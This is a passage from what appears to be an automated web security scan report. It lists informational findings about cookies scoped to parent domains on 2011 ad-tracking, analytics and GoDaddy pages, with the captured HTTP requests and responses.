The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ts=1315061013; domain=.mathtag.com; path=/; expires=Sun, 02-Sep-2012 14:43:33 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event/js?mt_id=108024&mt_adid=111&v1=&v2=&v3=&s1=&s2=&s3= HTTP/1.1
Host: pixel.mathtag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Cookie: uuid=4e394470-3e17-879f-6d77-411115d4b5ad; ts=1313859917; mt_mop=4:1313678521|10001:1312768945|10002:1313678517|13:1312375922

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x2 pid 0x79ea 31210
Cache-Control: no-cache
Content-Type: text/javascript
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sat, 03 Sep 2011 14:43:33 GMT
Connection: Keep-Alive
Set-Cookie: ts=1315061013; domain=.mathtag.com; path=/; expires=Sun, 02-Sep-2012 14:43:33 GMT
Content-Length: 924

   /*
   http://pixel.mathtag.com/event/img?mt_id=108043&mt_adid=111&v1=&v2=&v3=&s1=&s2=&s3=
   http://ad.yieldmanager.com/pixel?id=1429123&id=725544&id=74894&id=547417&id=119282&t=2
   */

   var mm_ri = Strin
...[SNIP]...

10.50. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=7908%3D1%264940%3D1; expires=Mon, 03-Oct-2011 17:32:23 GMT; path=/; domain=.rubiconproject.com
put_1994=vf1kj11kp2en; expires=Mon, 03-Oct-2011 17:32:23 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4940&nid=1994&put=vf1kj11kp2en&expires=30 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rpb=7908%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 17:32:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1; expires=Mon, 03-Oct-2011 17:32:23 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C2%2C%2C; expires=Mon, 03-Oct-2011 17:32:23 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1994=vf1kj11kp2en; expires=Mon, 03-Oct-2011 17:32:23 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.51. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=7908%3D1%264940%3D1%265364%3D1; expires=Mon, 03-Oct-2011 21:40:33 GMT; path=/; domain=.rubiconproject.com
put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; expires=Mon, 03-Oct-2011 21:40:33 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5364&nid=2046&expires=30&put=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=4&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Domain&dtmc_product_id=TTN%3A%20Domains%3A%20Search%3A%20Taken&dtmc_domain_name=xss.com&dtm_items=&dtmc_domain_status=TAKEN&dtmc_domain_variations=xss.la&dtmc_source=WWW000000000W&dtmc_ref=http%3A//www.register.com/&dtmc_loc=http%3A//www.register.com/domain/searchresults.rcmx%3Fwebmetrics%3Dnull%26searchOrigin%3Dhomepage%26domain%3Dxss%26selectedTLDs%3D.com%26x%3D0%26y%3D0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rpb=7908%3D1%264940%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C; put_1994=vf1kj11kp2en

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:40:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%265364%3D1; expires=Mon, 03-Oct-2011 21:40:33 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C0%2C2%2C%2C; expires=Mon, 03-Oct-2011 21:40:33 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; expires=Mon, 03-Oct-2011 21:40:33 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.52. http://r.openx.net/set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

i=fbe566bc-e601-4d14-a2ef-601df1907cf9; expires=Mon, 02-Sep-2013 14:44:00 GMT; path=/; domain=.openx.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=0b83a084-dd0b-4bfe-9e2e-ab3706fc9955&rtb=uuid%3D4e394470-3e17-879f-6d77-411115d4b5ad HTTP/1.1
Host: r.openx.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Cookie: i=fbe566bc-e601-4d14-a2ef-601df1907cf9; p=1313437184

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 14:44:00 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=fbe566bc-e601-4d14-a2ef-601df1907cf9; expires=Mon, 02-Sep-2013 14:44:00 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.53. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scripts.omniture.com
Path:	/global/scripts/targeting/dyn_prop.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

omniture_unique=6bcc0a791fca22f3e882adf94660e88c; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/targeting/dyn_prop.php HTTP/1.1
Host: scripts.omniture.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Cookie: s_cid=38212; s_iid=38573; cms_site_lang=1; offer_version=a%3A1%3A%7Bi%3A1057%3Bi%3A187%3B%7D; imploded_vars=50.23.123.106%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1313976253453-233900.19#1316119783|check#true#1314910243|session#1314910182276-94505#1314912043; elqCustomerGUID=19ddb6ae-1941-431a-9104-41006951b164; campaign_stack=%5B%5B'38212'%2C'1313976267286'%5D%5D; b1=Logged%3A%20Banner%20Group%3A%20Search+Engine+Land+-+300x250+-+ROS; b2=Logged%3A%20Banner%3A%20300x250+-+2629+CV2; _jsuid=7264741388645661943; s_osc=14885; s_lv=1314806934818; s_vnum=1317398913538%26vn%3D1; v1stsp=552ED6C388FBA32B

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Sat, 03 Sep 2011 18:43:32 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Mon, 04 Oct 2010 17:31:59 GMT
xserver: www5.dmz
Content-Length: 482
Content-Type: application/javascript
Date: Sat, 03 Sep 2011 14:43:32 GMT
Connection: close
Set-Cookie: omniture_unique=6bcc0a791fca22f3e882adf94660e88c; path=/; domain=omniture.com
Set-Cookie: BIGipServerhttp_omniture=84542986.5892.0000; path=/

mboxCreate('omniTargetingInfo',
'profile.geo_ip=50.23.123.106',
'profile.geo_zip=75207',
'profile.geo_gmt_offset=-500',
'profile.geo_country=usa',
'profile.geo_country_code=840',
'profile.geo_region=t
...[SNIP]...

10.54. http://segment-pixel.invitemedia.com/set_partner_uid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/set_partner_uid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

partnerUID="eyIxNjkiOiBbIjRlNWUzZjFhZTNmZDc0MjciLCB0cnVlXX0="; Domain=invitemedia.com; expires=Sun, 02-Sep-2012 17:32:22 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set_partner_uid?partnerID=169&partnerUID=4e5e3f1ae3fd7427&sscs_active=1 HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=e1c22076-53f3-4fd9-8356-2735bf06a66c; partnerUID="eyIxNjkiOiBbIjRlNWUzZjFhZTNmZDc0MjciLCB0cnVlXX0="; segments_p1="eJzjYuHY2M7IxcIx9wojAA9oAtg="; exchange_uid="eyI0IjogWyJDQUVTRVB4NVdCa2dwbTVNQ3pVRHd2TlVDNXciLCA3MzQzODNdfQ=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 03 Sep 2011 17:32:22 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sat, 03-Sep-2011 17:32:02 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: partnerUID="eyIxNjkiOiBbIjRlNWUzZjFhZTNmZDc0MjciLCB0cnVlXX0="; Domain=invitemedia.com; expires=Sun, 02-Sep-2012 17:32:22 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

10.55. http://social.expression.microsoft.com/Forums/ar-SA/wpf/thread/786f2813-de28-4eda-ba14-9910ce655dc6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.expression.microsoft.com
Path:	/Forums/ar-SA/wpf/thread/786f2813-de28-4eda-ba14-9910ce655dc6

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

msdn=L=1033; domain=.microsoft.com; expires=Mon, 03-Oct-2011 12:58:15 GMT; path=/
msdn=L=1033; domain=.microsoft.com; expires=Mon, 03-Oct-2011 12:58:15 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Forums/ar-SA/wpf/thread/786f2813-de28-4eda-ba14-9910ce655dc6 HTTP/1.1
Host: social.expression.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.56. http://social.expression.microsoft.com/Forums/da-DK/wpf/thread/16309d89-5f65-4e49-9ce5-38f2a466a2c0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.expression.microsoft.com
Path:	/Forums/da-DK/wpf/thread/16309d89-5f65-4e49-9ce5-38f2a466a2c0

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

msdn=L=1030; domain=.microsoft.com; expires=Mon, 03-Oct-2011 12:58:16 GMT; path=/
msdn=L=1030; domain=.microsoft.com; expires=Mon, 03-Oct-2011 12:58:16 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Forums/da-DK/wpf/thread/16309d89-5f65-4e49-9ce5-38f2a466a2c0 HTTP/1.1
Host: social.expression.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.57. http://static.getclicky.com/js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.getclicky.com
Path:	/js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

__cfduid=d1bed28fcd5cbef887c32392d5431dedf1315055711; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.getclicky.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js HTTP/1.1
Host: static.getclicky.com
Proxy-Connection: keep-alive
Referer: http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Sat, 03 Sep 2011 13:15:11 GMT
Content-Type: application/x-javascript
Connection: keep-alive
Last-Modified: Tue, 23 Aug 2011 01:10:54 GMT
Vary: Accept-Encoding
Expires: Sat, 10 Sep 2011 13:15:11 GMT
Cache-Control: max-age=604800
Set-Cookie: __cfduid=d1bed28fcd5cbef887c32392d5431dedf1315055711; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.getclicky.com
Set-Cookie: __cfduid=d1bed28fcd5cbef887c32392d5431dedf1315055711; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.static.getclicky.com
Content-Length: 9136

var clicky_obj=clicky_obj||(function(){var instance=null;function _ins(){var _self=this,site_ids=[],pageviews_fired=[],domain,secure,ref,ps_interval,ps_stop;this.init=function(site_id){site_ids.push(s
...[SNIP]...

10.58. http://www.godaddy.com/Payment/payment-options.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/Payment/payment-options.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:26:07 GMT; path=/
flag1=cflag=us; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:26:07 GMT; path=/
traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Payment/payment-options.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=11266%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=4f057259-4645-4223-96aa-98d6262a1c68&referringdomain=&split=6; domain=godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Payment/payment-options.aspx?ci=11266 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=4f057259-4645-4223-96aa-98d6262a1c68; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; traffic=; ASPSESSIONIDAATRCSST=DCJFEOKAIBECOFPMMBGNKPKK

Response

10.59. http://www.godaddy.com/affiliates/affiliate-program.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/affiliates/affiliate-program.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:25:56 GMT; path=/
traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/affiliates/affiliate-program.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=8d587be0-834e-4a03-83dc-2f3bcb783a40&referringdomain=&split=24; domain=godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /affiliates/affiliate-program.aspx HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; traffic=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:25:56 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/affiliates/affiliate-program.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=8d587be0-834e-4a03-83dc-2f3bcb783a40&referringdomain=&split=24; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 04 Sep 2011 00:25:55 GMT
Content-Length: 98753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><
...[SNIP]...

10.60. http://www.godaddy.com/gdshop/offers/cross_sell.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/gdshop/offers/cross_sell.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

currency1=potableSourceStr=USD; expires=Sun, 02-Sep-2012 07:00:00 GMT; domain=.godaddy.com; path=/
traffic=server=M1PWCORPWEB109&sitename=www%2Egodaddy%2Ecom&cookies=1&split=24&clientip=50%2E23%2E123%2E106&status=200+OK&referrer=http%3A%2F%2Fwww%2Egodaddy%2Ecom%2Fssl%2Fssl%2Dcertificates%2Easpx%3Fci%3D8346&isc=&privatelabelid=1&page=%2Fgdshop%2Foffers%2Fcross%5Fsell%2Easp&referringdomain=&referringpath=8d587be0%2D834e%2D4a03%2D83dc%2D2f3bcb783a40&shopper=46215684&querystring=ci%3D42031%26config%3Dssldefault; domain=.godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx?ci=8346
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=; adc1=US; currency1=potableSourceStr=USD; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa

Response

10.61. http://www.godaddy.com/shared/video/videos.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/shared/video/videos.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=4f057259-4645-4223-96aa-98d6262a1c68&referringdomain=&split=24; domain=godaddy.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/video/videos.aspx?ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/affiliates/affiliate-program.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; pathway=4f057259-4645-4223-96aa-98d6262a1c68; ASPSESSIONIDAATRCSST=DCJFEOKAIBECOFPMMBGNKPKK; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=oemhlbvbcgufsjahmchddfndphwizcii; adc1=US; currency1=potableSourceStr=USD; traffic=

Response

10.62. http://www.godaddy.com/ssl/JsonContent/GetMultiDomainsPlanList.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/ssl/JsonContent/GetMultiDomainsPlanList.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:29:25 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /ssl/JsonContent/GetMultiDomainsPlanList.aspx HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx?ci=8346
Content-Length: 82
Origin: http://www.godaddy.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; currency1=potableSourceStr=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB109&status=200 OK&querystring=ci=8346&shopper=&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=&referringdomain=&split=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1

